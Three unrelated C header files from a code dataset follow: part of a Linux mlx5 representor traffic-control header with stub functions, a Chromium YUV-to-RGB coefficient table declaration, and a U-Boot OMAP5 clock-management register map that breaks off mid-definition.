
/*
 * Port-affinity event hook; the stub variant returns NOTIFY_DONE, so the
 * return value presumably follows notifier-chain semantics — confirm in
 * the caller.
 */
int mlx5e_rep_tc_event_port_affinity(struct mlx5e_priv *priv);

/*
 * Update offloaded flows for an encapsulation entry when its neighbour
 * state changes; @ha is the neighbour's hardware (MAC) address.
 */
void mlx5e_rep_update_flows(struct mlx5e_priv *priv,
			    struct mlx5e_encap_entry *e,
			    bool neigh_connected,
			    unsigned char ha[ETH_ALEN]);

/* Attach/detach an encap entry to/from its neighbour-update machinery. */
int mlx5e_rep_encap_entry_attach(struct mlx5e_priv *priv,
				 struct mlx5e_encap_entry *e);
void mlx5e_rep_encap_entry_detach(struct mlx5e_priv *priv,
				  struct mlx5e_encap_entry *e);

/* ndo_setup_tc-style entry point for the representor netdev. */
int mlx5e_rep_setup_tc(struct net_device *dev, enum tc_setup_type type,
		       void *type_data);

/*
 * RX path: restore TC metadata on @skb from CQE information.  The stub
 * returns true, i.e. "keep processing the skb" is the default outcome.
 */
bool mlx5e_rep_tc_update_skb(struct mlx5_cqe64 *cqe,
			     struct sk_buff *skb,
			     struct mlx5e_tc_update_priv *tc_priv);
void mlx5_rep_tc_post_napi_receive(struct mlx5e_tc_update_priv *tc_priv);

#else /* CONFIG_MLX5_CLS_ACT */

struct mlx5e_rep_priv;

/* No-op stubs: succeed (0), do nothing, or report "not supported". */
static inline int mlx5e_rep_tc_init(struct mlx5e_rep_priv *rpriv) { return 0; }
static inline void mlx5e_rep_tc_cleanup(struct mlx5e_rep_priv *rpriv) {}

static inline int
mlx5e_rep_tc_netdevice_event_register(struct mlx5e_rep_priv *rpriv) { return 0; }
static inline void
mlx5e_rep_tc_netdevice_event_unregister(struct mlx5e_rep_priv *rpriv) {}

static inline void mlx5e_rep_tc_enable(struct mlx5e_priv *priv) {}
static inline void mlx5e_rep_tc_disable(struct mlx5e_priv *priv) {}

static inline int
mlx5e_rep_tc_event_port_affinity(struct mlx5e_priv *priv) { return NOTIFY_DONE; }

static inline int
mlx5e_rep_setup_tc(struct net_device *dev, enum tc_setup_type type,
		   void *type_data) { return -EOPNOTSUPP; }

struct mlx5e_tc_update_priv;

/* Without CLS_ACT there is no metadata to restore; accept the skb as-is. */
static inline bool
mlx5e_rep_tc_update_skb(struct mlx5_cqe64 *cqe,
			struct sk_buff *skb,
			struct mlx5e_tc_update_priv *tc_priv) { return true; }
static inline void
mlx5_rep_tc_post_napi_receive(struct mlx5e_tc_update_priv *tc_priv) {}

#endif /* CONFIG_MLX5_CLS_ACT */
#endif /* __MLX5_EN_REP_TC_H__ */
{ "language": "C" }
// Copyright (c) 2011 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. // Defines convertion table from YUV to RGB. #ifndef MEDIA_BASE_SIMD_YUV_TO_RGB_TABLE_H_ #define MEDIA_BASE_SIMD_YUV_TO_RGB_TABLE_H_ #include "base/basictypes.h" #include "build/build_config.h" extern "C" { #if defined(COMPILER_MSVC) #define SIMD_ALIGNED(var) __declspec(align(16)) var #else #define SIMD_ALIGNED(var) var __attribute__((aligned(16))) #endif // Align the table to 16-bytes to allow faster reading. extern SIMD_ALIGNED(int16 kCoefficientsRgbY[768][4]); } // extern "C" #endif // MEDIA_BASE_SIMD_YUV_TO_RGB_TABLE_H_
{ "language": "C" }
/* * (C) Copyright 2010 * Texas Instruments, <www.ti.com> * * Aneesh V <aneesh@ti.com> * Sricharan R <r.sricharan@ti.com> * * See file CREDITS for list of people who contributed to this * project. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License as * published by the Free Software Foundation; either version 2 of * the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, * MA 02111-1307 USA */ #ifndef _CLOCKS_OMAP5_H_ #define _CLOCKS_OMAP5_H_ #include <common.h> /* * Assuming a maximum of 1.5 GHz ARM speed and a minimum of 2 cycles per * loop, allow for a minimum of 2 ms wait (in reality the wait will be * much more than that) */ #define LDELAY 1000000 #define CM_CLKMODE_DPLL_CORE (OMAP54XX_L4_CORE_BASE + 0x4120) #define CM_CLKMODE_DPLL_PER (OMAP54XX_L4_CORE_BASE + 0x8140) #define CM_CLKMODE_DPLL_MPU (OMAP54XX_L4_CORE_BASE + 0x4160) #define CM_CLKSEL_CORE (OMAP54XX_L4_CORE_BASE + 0x4100) struct omap5_prcm_regs { /* cm1.ckgen */ u32 cm_clksel_core; /* 4a004100 */ u32 pad001[1]; /* 4a004104 */ u32 cm_clksel_abe; /* 4a004108 */ u32 pad002[1]; /* 4a00410c */ u32 cm_dll_ctrl; /* 4a004110 */ u32 pad003[3]; /* 4a004114 */ u32 cm_clkmode_dpll_core; /* 4a004120 */ u32 cm_idlest_dpll_core; /* 4a004124 */ u32 cm_autoidle_dpll_core; /* 4a004128 */ u32 cm_clksel_dpll_core; /* 4a00412c */ u32 cm_div_m2_dpll_core; /* 4a004130 */ u32 cm_div_m3_dpll_core; /* 4a004134 */ u32 cm_div_h11_dpll_core; /* 4a004138 */ u32 cm_div_h12_dpll_core; /* 4a00413c */ u32 cm_div_h13_dpll_core; /* 4a004140 
*/ u32 cm_div_h14_dpll_core; /* 4a004144 */ u32 cm_ssc_deltamstep_dpll_core; /* 4a004148 */ u32 cm_ssc_modfreqdiv_dpll_core; /* 4a00414c */ u32 cm_emu_override_dpll_core; /* 4a004150 */ u32 cm_div_h22_dpllcore; /* 4a004154 */ u32 cm_div_h23_dpll_core; /* 4a004158 */ u32 pad0041[1]; /* 4a00415c */ u32 cm_clkmode_dpll_mpu; /* 4a004160 */ u32 cm_idlest_dpll_mpu; /* 4a004164 */ u32 cm_autoidle_dpll_mpu; /* 4a004168 */ u32 cm_clksel_dpll_mpu; /* 4a00416c */ u32 cm_div_m2_dpll_mpu; /* 4a004170 */ u32 pad005[5]; /* 4a004174 */ u32 cm_ssc_deltamstep_dpll_mpu; /* 4a004188 */ u32 cm_ssc_modfreqdiv_dpll_mpu; /* 4a00418c */ u32 pad006[3]; /* 4a004190 */ u32 cm_bypclk_dpll_mpu; /* 4a00419c */ u32 cm_clkmode_dpll_iva; /* 4a0041a0 */ u32 cm_idlest_dpll_iva; /* 4a0041a4 */ u32 cm_autoidle_dpll_iva; /* 4a0041a8 */ u32 cm_clksel_dpll_iva; /* 4a0041ac */ u32 pad007[2]; /* 4a0041b0 */ u32 cm_div_h11_dpll_iva; /* 4a0041b8 */ u32 cm_div_h12_dpll_iva; /* 4a0041bc */ u32 pad008[2]; /* 4a0041c0 */ u32 cm_ssc_deltamstep_dpll_iva; /* 4a0041c8 */ u32 cm_ssc_modfreqdiv_dpll_iva; /* 4a0041cc */ u32 pad009[3]; /* 4a0041d0 */ u32 cm_bypclk_dpll_iva; /* 4a0041dc */ u32 cm_clkmode_dpll_abe; /* 4a0041e0 */ u32 cm_idlest_dpll_abe; /* 4a0041e4 */ u32 cm_autoidle_dpll_abe; /* 4a0041e8 */ u32 cm_clksel_dpll_abe; /* 4a0041ec */ u32 cm_div_m2_dpll_abe; /* 4a0041f0 */ u32 cm_div_m3_dpll_abe; /* 4a0041f4 */ u32 pad010[4]; /* 4a0041f8 */ u32 cm_ssc_deltamstep_dpll_abe; /* 4a004208 */ u32 cm_ssc_modfreqdiv_dpll_abe; /* 4a00420c */ u32 pad011[4]; /* 4a004210 */ u32 cm_clkmode_dpll_ddrphy; /* 4a004220 */ u32 cm_idlest_dpll_ddrphy; /* 4a004224 */ u32 cm_autoidle_dpll_ddrphy; /* 4a004228 */ u32 cm_clksel_dpll_ddrphy; /* 4a00422c */ u32 cm_div_m2_dpll_ddrphy; /* 4a004230 */ u32 pad012[1]; /* 4a004234 */ u32 cm_div_h11_dpll_ddrphy; /* 4a004238 */ u32 cm_div_h12_dpll_ddrphy; /* 4a00423c */ u32 cm_div_h13_dpll_ddrphy; /* 4a004240 */ u32 pad013[1]; /* 4a004244 */ u32 cm_ssc_deltamstep_dpll_ddrphy; /* 4a004248 */ u32 
pad014[5]; /* 4a00424c */ u32 cm_shadow_freq_config1; /* 4a004260 */ u32 pad0141[47]; /* 4a004264 */ u32 cm_mpu_mpu_clkctrl; /* 4a004320 */ /* cm1.dsp */ u32 pad015[55]; /* 4a004324 */ u32 cm_dsp_clkstctrl; /* 4a004400 */ u32 pad016[7]; /* 4a004404 */ u32 cm_dsp_dsp_clkctrl; /* 4a004420 */ /* cm1.abe */ u32 pad017[55]; /* 4a004424 */ u32 cm1_abe_clkstctrl; /* 4a004500 */ u32 pad018[7]; /* 4a004504 */ u32 cm1_abe_l4abe_clkctrl; /* 4a004520 */ u32 pad019[1]; /* 4a004524 */ u32 cm1_abe_aess_clkctrl; /* 4a004528 */ u32 pad020[1]; /* 4a00452c */ u32 cm1_abe_pdm_clkctrl; /* 4a004530 */ u32 pad021[1]; /* 4a004534 */ u32 cm1_abe_dmic_clkctrl; /* 4a004538 */ u32 pad022[1]; /* 4a00453c */ u32 cm1_abe_mcasp_clkctrl; /* 4a004540 */ u32 pad023[1]; /* 4a004544 */ u32 cm1_abe_mcbsp1_clkctrl; /* 4a004548 */ u32 pad024[1]; /* 4a00454c */ u32 cm1_abe_mcbsp2_clkctrl; /* 4a004550 */ u32 pad025[1]; /* 4a004554 */ u32 cm1_abe_mcbsp3_clkctrl; /* 4a004558 */ u32 pad026[1]; /* 4a00455c */ u32 cm1_abe_slimbus_clkctrl; /* 4a004560 */ u32 pad027[1]; /* 4a004564 */ u32 cm1_abe_timer5_clkctrl; /* 4a004568 */ u32 pad028[1]; /* 4a00456c */ u32 cm1_abe_timer6_clkctrl; /* 4a004570 */ u32 pad029[1]; /* 4a004574 */ u32 cm1_abe_timer7_clkctrl; /* 4a004578 */ u32 pad030[1]; /* 4a00457c */ u32 cm1_abe_timer8_clkctrl; /* 4a004580 */ u32 pad031[1]; /* 4a004584 */ u32 cm1_abe_wdt3_clkctrl; /* 4a004588 */ /* cm2.ckgen */ u32 pad032[3805]; /* 4a00458c */ u32 cm_clksel_mpu_m3_iss_root; /* 4a008100 */ u32 cm_clksel_usb_60mhz; /* 4a008104 */ u32 cm_scale_fclk; /* 4a008108 */ u32 pad033[1]; /* 4a00810c */ u32 cm_core_dvfs_perf1; /* 4a008110 */ u32 cm_core_dvfs_perf2; /* 4a008114 */ u32 cm_core_dvfs_perf3; /* 4a008118 */ u32 cm_core_dvfs_perf4; /* 4a00811c */ u32 pad034[1]; /* 4a008120 */ u32 cm_core_dvfs_current; /* 4a008124 */ u32 cm_iva_dvfs_perf_tesla; /* 4a008128 */ u32 cm_iva_dvfs_perf_ivahd; /* 4a00812c */ u32 cm_iva_dvfs_perf_abe; /* 4a008130 */ u32 pad035[1]; /* 4a008134 */ u32 cm_iva_dvfs_current; /* 
4a008138 */ u32 pad036[1]; /* 4a00813c */ u32 cm_clkmode_dpll_per; /* 4a008140 */ u32 cm_idlest_dpll_per; /* 4a008144 */ u32 cm_autoidle_dpll_per; /* 4a008148 */ u32 cm_clksel_dpll_per; /* 4a00814c */ u32 cm_div_m2_dpll_per; /* 4a008150 */ u32 cm_div_m3_dpll_per; /* 4a008154 */ u32 cm_div_h11_dpll_per; /* 4a008158 */ u32 cm_div_h12_dpll_per; /* 4a00815c */ u32 pad0361[1]; /* 4a008160 */ u32 cm_div_h14_dpll_per; /* 4a008164 */ u32 cm_ssc_deltamstep_dpll_per; /* 4a008168 */ u32 cm_ssc_modfreqdiv_dpll_per; /* 4a00816c */ u32 cm_emu_override_dpll_per; /* 4a008170 */ u32 pad037[3]; /* 4a008174 */ u32 cm_clkmode_dpll_usb; /* 4a008180 */ u32 cm_idlest_dpll_usb; /* 4a008184 */ u32 cm_autoidle_dpll_usb; /* 4a008188 */ u32 cm_clksel_dpll_usb; /* 4a00818c */ u32 cm_div_m2_dpll_usb; /* 4a008190 */ u32 pad038[5]; /* 4a008194 */ u32 cm_ssc_deltamstep_dpll_usb; /* 4a0081a8 */ u32 cm_ssc_modfreqdiv_dpll_usb; /* 4a0081ac */ u32 pad039[1]; /* 4a0081b0 */ u32 cm_clkdcoldo_dpll_usb; /* 4a0081b4 */ u32 pad040[2]; /* 4a0081b8 */ u32 cm_clkmode_dpll_unipro; /* 4a0081c0 */ u32 cm_idlest_dpll_unipro; /* 4a0081c4 */ u32 cm_autoidle_dpll_unipro; /* 4a0081c8 */ u32 cm_clksel_dpll_unipro; /* 4a0081cc */ u32 cm_div_m2_dpll_unipro; /* 4a0081d0 */ u32 pad041[5]; /* 4a0081d4 */ u32 cm_ssc_deltamstep_dpll_unipro; /* 4a0081e8 */ u32 cm_ssc_modfreqdiv_dpll_unipro; /* 4a0081ec */ /* cm2.core */ u32 pad0411[324]; /* 4a0081f0 */ u32 cm_l3_1_clkstctrl; /* 4a008700 */ u32 pad042[1]; /* 4a008704 */ u32 cm_l3_1_dynamicdep; /* 4a008708 */ u32 pad043[5]; /* 4a00870c */ u32 cm_l3_1_l3_1_clkctrl; /* 4a008720 */ u32 pad044[55]; /* 4a008724 */ u32 cm_l3_2_clkstctrl; /* 4a008800 */ u32 pad045[1]; /* 4a008804 */ u32 cm_l3_2_dynamicdep; /* 4a008808 */ u32 pad046[5]; /* 4a00880c */ u32 cm_l3_2_l3_2_clkctrl; /* 4a008820 */ u32 pad047[1]; /* 4a008824 */ u32 cm_l3_2_gpmc_clkctrl; /* 4a008828 */ u32 pad048[1]; /* 4a00882c */ u32 cm_l3_2_ocmc_ram_clkctrl; /* 4a008830 */ u32 pad049[51]; /* 4a008834 */ u32 
cm_mpu_m3_clkstctrl; /* 4a008900 */ u32 cm_mpu_m3_staticdep; /* 4a008904 */ u32 cm_mpu_m3_dynamicdep; /* 4a008908 */ u32 pad050[5]; /* 4a00890c */ u32 cm_mpu_m3_mpu_m3_clkctrl; /* 4a008920 */ u32 pad051[55]; /* 4a008924 */ u32 cm_sdma_clkstctrl; /* 4a008a00 */ u32 cm_sdma_staticdep; /* 4a008a04 */ u32 cm_sdma_dynamicdep; /* 4a008a08 */ u32 pad052[5]; /* 4a008a0c */ u32 cm_sdma_sdma_clkctrl; /* 4a008a20 */ u32 pad053[55]; /* 4a008a24 */ u32 cm_memif_clkstctrl; /* 4a008b00 */ u32 pad054[7]; /* 4a008b04 */ u32 cm_memif_dmm_clkctrl; /* 4a008b20 */ u32 pad055[1]; /* 4a008b24 */ u32 cm_memif_emif_fw_clkctrl; /* 4a008b28 */ u32 pad056[1]; /* 4a008b2c */ u32 cm_memif_emif_1_clkctrl; /* 4a008b30 */ u32 pad057[1]; /* 4a008b34 */ u32 cm_memif_emif_2_clkctrl; /* 4a008b38 */ u32 pad058[1]; /* 4a008b3c */ u32 cm_memif_dll_clkctrl; /* 4a008b40 */ u32 pad059[3]; /* 4a008b44 */ u32 cm_memif_emif_h1_clkctrl; /* 4a008b50 */ u32 pad060[1]; /* 4a008b54 */ u32 cm_memif_emif_h2_clkctrl; /* 4a008b58 */ u32 pad061[1]; /* 4a008b5c */ u32 cm_memif_dll_h_clkctrl; /* 4a008b60 */ u32 pad062[39]; /* 4a008b64 */ u32 cm_c2c_clkstctrl; /* 4a008c00 */ u32 cm_c2c_staticdep; /* 4a008c04 */ u32 cm_c2c_dynamicdep; /* 4a008c08 */ u32 pad063[5]; /* 4a008c0c */ u32 cm_c2c_sad2d_clkctrl; /* 4a008c20 */ u32 pad064[1]; /* 4a008c24 */ u32 cm_c2c_modem_icr_clkctrl; /* 4a008c28 */ u32 pad065[1]; /* 4a008c2c */ u32 cm_c2c_sad2d_fw_clkctrl; /* 4a008c30 */ u32 pad066[51]; /* 4a008c34 */ u32 cm_l4cfg_clkstctrl; /* 4a008d00 */ u32 pad067[1]; /* 4a008d04 */ u32 cm_l4cfg_dynamicdep; /* 4a008d08 */ u32 pad068[5]; /* 4a008d0c */ u32 cm_l4cfg_l4_cfg_clkctrl; /* 4a008d20 */ u32 pad069[1]; /* 4a008d24 */ u32 cm_l4cfg_hw_sem_clkctrl; /* 4a008d28 */ u32 pad070[1]; /* 4a008d2c */ u32 cm_l4cfg_mailbox_clkctrl; /* 4a008d30 */ u32 pad071[1]; /* 4a008d34 */ u32 cm_l4cfg_sar_rom_clkctrl; /* 4a008d38 */ u32 pad072[49]; /* 4a008d3c */ u32 cm_l3instr_clkstctrl; /* 4a008e00 */ u32 pad073[7]; /* 4a008e04 */ u32 cm_l3instr_l3_3_clkctrl; 
/* 4a008e20 */ u32 pad074[1]; /* 4a008e24 */ u32 cm_l3instr_l3_instr_clkctrl; /* 4a008e28 */ u32 pad075[5]; /* 4a008e2c */ u32 cm_l3instr_intrconn_wp1_clkctrl; /* 4a008e40 */ /* cm2.ivahd */ u32 pad076[47]; /* 4a008e44 */ u32 cm_ivahd_clkstctrl; /* 4a008f00 */ u32 pad077[7]; /* 4a008f04 */ u32 cm_ivahd_ivahd_clkctrl; /* 4a008f20 */ u32 pad078[1]; /* 4a008f24 */ u32 cm_ivahd_sl2_clkctrl; /* 4a008f28 */ /* cm2.cam */ u32 pad079[53]; /* 4a008f2c */ u32 cm_cam_clkstctrl; /* 4a009000 */ u32 pad080[7]; /* 4a009004 */ u32 cm_cam_iss_clkctrl; /* 4a009020 */ u32 pad081[1]; /* 4a009024 */ u32 cm_cam_fdif_clkctrl; /* 4a009028 */ /* cm2.dss */ u32 pad082[53]; /* 4a00902c */ u32 cm_dss_clkstctrl; /* 4a009100 */ u32 pad083[7]; /* 4a009104 */ u32 cm_dss_dss_clkctrl; /* 4a009120 */ /* cm2.sgx */ u32 pad084[55]; /* 4a009124 */ u32 cm_sgx_clkstctrl; /* 4a009200 */ u32 pad085[7]; /* 4a009204 */ u32 cm_sgx_sgx_clkctrl; /* 4a009220 */ /* cm2.l3init */ u32 pad086[55]; /* 4a009224 */ u32 cm_l3init_clkstctrl; /* 4a009300 */ /* cm2.l3init */ u32 pad087[9]; /* 4a009304 */ u32 cm_l3init_hsmmc1_clkctrl; /* 4a009328 */ u32 pad088[1]; /* 4a00932c */ u32 cm_l3init_hsmmc2_clkctrl; /* 4a009330 */ u32 pad089[1]; /* 4a009334 */ u32 cm_l3init_hsi_clkctrl; /* 4a009338 */ u32 pad090[7]; /* 4a00933c */ u32 cm_l3init_hsusbhost_clkctrl; /* 4a009358 */ u32 pad091[1]; /* 4a00935c */ u32 cm_l3init_hsusbotg_clkctrl; /* 4a009360 */ u32 pad092[1]; /* 4a009364 */ u32 cm_l3init_hsusbtll_clkctrl; /* 4a009368 */ u32 pad093[3]; /* 4a00936c */ u32 cm_l3init_p1500_clkctrl; /* 4a009378 */ u32 pad094[21]; /* 4a00937c */ u32 cm_l3init_fsusb_clkctrl; /* 4a0093d0 */ u32 pad095[3]; /* 4a0093d4 */ u32 cm_l3init_ocp2scp1_clkctrl; /* cm2.l4per */ u32 pad096[7]; /* 4a0093e4 */ u32 cm_l4per_clkstctrl; /* 4a009400 */ u32 pad097[1]; /* 4a009404 */ u32 cm_l4per_dynamicdep; /* 4a009408 */ u32 pad098[5]; /* 4a00940c */ u32 cm_l4per_adc_clkctrl; /* 4a009420 */ u32 pad100[1]; /* 4a009424 */ u32 cm_l4per_gptimer10_clkctrl; /* 4a009428 
*/ u32 pad101[1]; /* 4a00942c */ u32 cm_l4per_gptimer11_clkctrl; /* 4a009430 */ u32 pad102[1]; /* 4a009434 */ u32 cm_l4per_gptimer2_clkctrl; /* 4a009438 */ u32 pad103[1]; /* 4a00943c */ u32 cm_l4per_gptimer3_clkctrl; /* 4a009440 */ u32 pad104[1]; /* 4a009444 */ u32 cm_l4per_gptimer4_clkctrl; /* 4a009448 */ u32 pad105[1]; /* 4a00944c */ u32 cm_l4per_gptimer9_clkctrl; /* 4a009450 */ u32 pad106[1]; /* 4a009454 */ u32 cm_l4per_elm_clkctrl; /* 4a009458 */ u32 pad107[1]; /* 4a00945c */ u32 cm_l4per_gpio2_clkctrl; /* 4a009460 */ u32 pad108[1]; /* 4a009464 */ u32 cm_l4per_gpio3_clkctrl; /* 4a009468 */ u32 pad109[1]; /* 4a00946c */ u32 cm_l4per_gpio4_clkctrl; /* 4a009470 */ u32 pad110[1]; /* 4a009474 */ u32 cm_l4per_gpio5_clkctrl; /* 4a009478 */ u32 pad111[1]; /* 4a00947c */ u32 cm_l4per_gpio6_clkctrl; /* 4a009480 */ u32 pad112[1]; /* 4a009484 */ u32 cm_l4per_hdq1w_clkctrl; /* 4a009488 */ u32 pad113[1]; /* 4a00948c */ u32 cm_l4per_hecc1_clkctrl; /* 4a009490 */ u32 pad114[1]; /* 4a009494 */ u32 cm_l4per_hecc2_clkctrl; /* 4a009498 */ u32 pad115[1]; /* 4a00949c */ u32 cm_l4per_i2c1_clkctrl; /* 4a0094a0 */ u32 pad116[1]; /* 4a0094a4 */ u32 cm_l4per_i2c2_clkctrl; /* 4a0094a8 */ u32 pad117[1]; /* 4a0094ac */ u32 cm_l4per_i2c3_clkctrl; /* 4a0094b0 */ u32 pad118[1]; /* 4a0094b4 */ u32 cm_l4per_i2c4_clkctrl; /* 4a0094b8 */ u32 pad119[1]; /* 4a0094bc */ u32 cm_l4per_l4per_clkctrl; /* 4a0094c0 */ u32 pad1191[3]; /* 4a0094c4 */ u32 cm_l4per_mcasp2_clkctrl; /* 4a0094d0 */ u32 pad120[1]; /* 4a0094d4 */ u32 cm_l4per_mcasp3_clkctrl; /* 4a0094d8 */ u32 pad121[3]; /* 4a0094dc */ u32 cm_l4per_mgate_clkctrl; /* 4a0094e8 */ u32 pad123[1]; /* 4a0094ec */ u32 cm_l4per_mcspi1_clkctrl; /* 4a0094f0 */ u32 pad124[1]; /* 4a0094f4 */ u32 cm_l4per_mcspi2_clkctrl; /* 4a0094f8 */ u32 pad125[1]; /* 4a0094fc */ u32 cm_l4per_mcspi3_clkctrl; /* 4a009500 */ u32 pad126[1]; /* 4a009504 */ u32 cm_l4per_mcspi4_clkctrl; /* 4a009508 */ u32 pad127[1]; /* 4a00950c */ u32 cm_l4per_gpio7_clkctrl; /* 4a009510 */ u32 
pad1271[1]; /* 4a009514 */ u32 cm_l4per_gpio8_clkctrl; /* 4a009518 */ u32 pad1272[1]; /* 4a00951c */ u32 cm_l4per_mmcsd3_clkctrl; /* 4a009520 */ u32 pad128[1]; /* 4a009524 */ u32 cm_l4per_mmcsd4_clkctrl; /* 4a009528 */ u32 pad129[1]; /* 4a00952c */ u32 cm_l4per_msprohg_clkctrl; /* 4a009530 */ u32 pad130[1]; /* 4a009534 */ u32 cm_l4per_slimbus2_clkctrl; /* 4a009538 */ u32 pad131[1]; /* 4a00953c */ u32 cm_l4per_uart1_clkctrl; /* 4a009540 */ u32 pad132[1]; /* 4a009544 */ u32 cm_l4per_uart2_clkctrl; /* 4a009548 */ u32 pad133[1]; /* 4a00954c */ u32 cm_l4per_uart3_clkctrl; /* 4a009550 */ u32 pad134[1]; /* 4a009554 */ u32 cm_l4per_uart4_clkctrl; /* 4a009558 */ u32 pad135[1]; /* 4a00955c */ u32 cm_l4per_mmcsd5_clkctrl; /* 4a009560 */ u32 pad136[1]; /* 4a009564 */ u32 cm_l4per_i2c5_clkctrl; /* 4a009568 */ u32 pad1371[1]; /* 4a00956c */ u32 cm_l4per_uart5_clkctrl; /* 4a009570 */ u32 pad1372[1]; /* 4a009574 */ u32 cm_l4per_uart6_clkctrl; /* 4a009578 */ u32 pad1374[1]; /* 4a00957c */ u32 cm_l4sec_clkstctrl; /* 4a009580 */ u32 cm_l4sec_staticdep; /* 4a009584 */ u32 cm_l4sec_dynamicdep; /* 4a009588 */ u32 pad138[5]; /* 4a00958c */ u32 cm_l4sec_aes1_clkctrl; /* 4a0095a0 */ u32 pad139[1]; /* 4a0095a4 */ u32 cm_l4sec_aes2_clkctrl; /* 4a0095a8 */ u32 pad140[1]; /* 4a0095ac */ u32 cm_l4sec_des3des_clkctrl; /* 4a0095b0 */ u32 pad141[1]; /* 4a0095b4 */ u32 cm_l4sec_pkaeip29_clkctrl; /* 4a0095b8 */ u32 pad142[1]; /* 4a0095bc */ u32 cm_l4sec_rng_clkctrl; /* 4a0095c0 */ u32 pad143[1]; /* 4a0095c4 */ u32 cm_l4sec_sha2md51_clkctrl; /* 4a0095c8 */ u32 pad144[3]; /* 4a0095cc */ u32 cm_l4sec_cryptodma_clkctrl; /* 4a0095d8 */ u32 pad145[3660425]; /* 4a0095dc */ /* l4 wkup regs */ u32 pad201[6211]; /* 4ae00000 */ u32 cm_abe_pll_ref_clksel; /* 4ae0610c */ u32 cm_sys_clksel; /* 4ae06110 */ u32 pad202[1467]; /* 4ae06114 */ u32 cm_wkup_clkstctrl; /* 4ae07800 */ u32 pad203[7]; /* 4ae07804 */ u32 cm_wkup_l4wkup_clkctrl; /* 4ae07820 */ u32 pad204; /* 4ae07824 */ u32 cm_wkup_wdtimer1_clkctrl; /* 
4ae07828 */ u32 pad205; /* 4ae0782c */ u32 cm_wkup_wdtimer2_clkctrl; /* 4ae07830 */ u32 pad206; /* 4ae07834 */ u32 cm_wkup_gpio1_clkctrl; /* 4ae07838 */ u32 pad207; /* 4ae0783c */ u32 cm_wkup_gptimer1_clkctrl; /* 4ae07840 */ u32 pad208; /* 4ae07844 */ u32 cm_wkup_gptimer12_clkctrl; /* 4ae07848 */ u32 pad209; /* 4ae0784c */ u32 cm_wkup_synctimer_clkctrl; /* 4ae07850 */ u32 pad210; /* 4ae07854 */ u32 cm_wkup_usim_clkctrl; /* 4ae07858 */ u32 pad211; /* 4ae0785c */ u32 cm_wkup_sarram_clkctrl; /* 4ae07860 */ u32 pad212[5]; /* 4ae07864 */ u32 cm_wkup_keyboard_clkctrl; /* 4ae07878 */ u32 pad213; /* 4ae0787c */ u32 cm_wkup_rtc_clkctrl; /* 4ae07880 */ u32 pad214; /* 4ae07884 */ u32 cm_wkup_bandgap_clkctrl; /* 4ae07888 */ u32 pad215[1]; /* 4ae0788c */ u32 cm_wkupaon_scrm_clkctrl; /* 4ae07890 */ u32 pad216[195]; u32 prm_vc_val_bypass; /* 4ae07ba0 */ u32 pad217[4]; u32 prm_vc_cfg_i2c_mode; /* 4ae07bb4 */ u32 prm_vc_cfg_i2c_clk; /* 4ae07bb8 */ u32 pad218[2]; u32 prm_sldo_core_setup; /* 4ae07bc4 */ u32 prm_sldo_core_ctrl; /* 4ae07bc8 */ u32 prm_sldo_mpu_setup; /* 4ae07bcc */ u32 prm_sldo_mpu_ctrl; /* 4ae07bd0 */ u32 prm_sldo_mm_setup; /* 4ae07bd4 */ u32 prm_sldo_mm_ctrl; /* 4ae07bd8 */ }; /* DPLL register offsets */ #define CM_CLKMODE_DPLL 0 #define CM_IDLEST_DPLL 0x4 #define CM_AUTOIDLE_DPLL 0x8 #define CM_CLKSEL_DPLL 0xC #define DPLL_CLKOUT_DIV_MASK 0x1F /* post-divider mask */ /* CM_DLL_CTRL */ #define CM_DLL_CTRL_OVERRIDE_SHIFT 0 #define CM_DLL_CTRL_OVERRIDE_MASK (1 << 0) #define CM_DLL_CTRL_NO_OVERRIDE 0 /* CM_CLKMODE_DPLL */ #define CM_CLKMODE_DPLL_REGM4XEN_SHIFT 11 #define CM_CLKMODE_DPLL_REGM4XEN_MASK (1 << 11) #define CM_CLKMODE_DPLL_LPMODE_EN_SHIFT 10 #define CM_CLKMODE_DPLL_LPMODE_EN_MASK (1 << 10) #define CM_CLKMODE_DPLL_RELOCK_RAMP_EN_SHIFT 9 #define CM_CLKMODE_DPLL_RELOCK_RAMP_EN_MASK (1 << 9) #define CM_CLKMODE_DPLL_DRIFTGUARD_EN_SHIFT 8 #define CM_CLKMODE_DPLL_DRIFTGUARD_EN_MASK (1 << 8) #define CM_CLKMODE_DPLL_RAMP_RATE_SHIFT 5 #define 
CM_CLKMODE_DPLL_RAMP_RATE_MASK (0x7 << 5) #define CM_CLKMODE_DPLL_EN_SHIFT 0 #define CM_CLKMODE_DPLL_EN_MASK (0x7 << 0) #define CM_CLKMODE_DPLL_DPLL_EN_SHIFT 0 #define CM_CLKMODE_DPLL_DPLL_EN_MASK 7 #define DPLL_EN_STOP 1 #define DPLL_EN_MN_BYPASS 4 #define DPLL_EN_LOW_POWER_BYPASS 5 #define DPLL_EN_FAST_RELOCK_BYPASS 6 #define DPLL_EN_LOCK 7 /* CM_IDLEST_DPLL fields */ #define ST_DPLL_CLK_MASK 1 /* SGX */ #define CLKSEL_GPU_HYD_GCLK_MASK (1 << 25) #define CLKSEL_GPU_CORE_GCLK_MASK (1 << 24) /* CM_CLKSEL_DPLL */ #define CM_CLKSEL_DPLL_DPLL_SD_DIV_SHIFT 24 #define CM_CLKSEL_DPLL_DPLL_SD_DIV_MASK (0xFF << 24) #define CM_CLKSEL_DPLL_M_SHIFT 8 #define CM_CLKSEL_DPLL_M_MASK (0x7FF << 8) #define CM_CLKSEL_DPLL_N_SHIFT 0 #define CM_CLKSEL_DPLL_N_MASK 0x7F #define CM_CLKSEL_DCC_EN_SHIFT 22 #define CM_CLKSEL_DCC_EN_MASK (1 << 22) #define OMAP4_DPLL_MAX_N 127 /* CM_SYS_CLKSEL */ #define CM_SYS_CLKSEL_SYS_CLKSEL_MASK 7 /* CM_CLKSEL_CORE */ #define CLKSEL_CORE_SHIFT 0 #define CLKSEL_L3_SHIFT 4 #define CLKSEL_L4_SHIFT 8 #define CLKSEL_CORE_X2_DIV_1 0 #define CLKSEL_L3_CORE_DIV_2 1 #define CLKSEL_L4_L3_DIV_2 1 /* CM_ABE_PLL_REF_CLKSEL */ #define 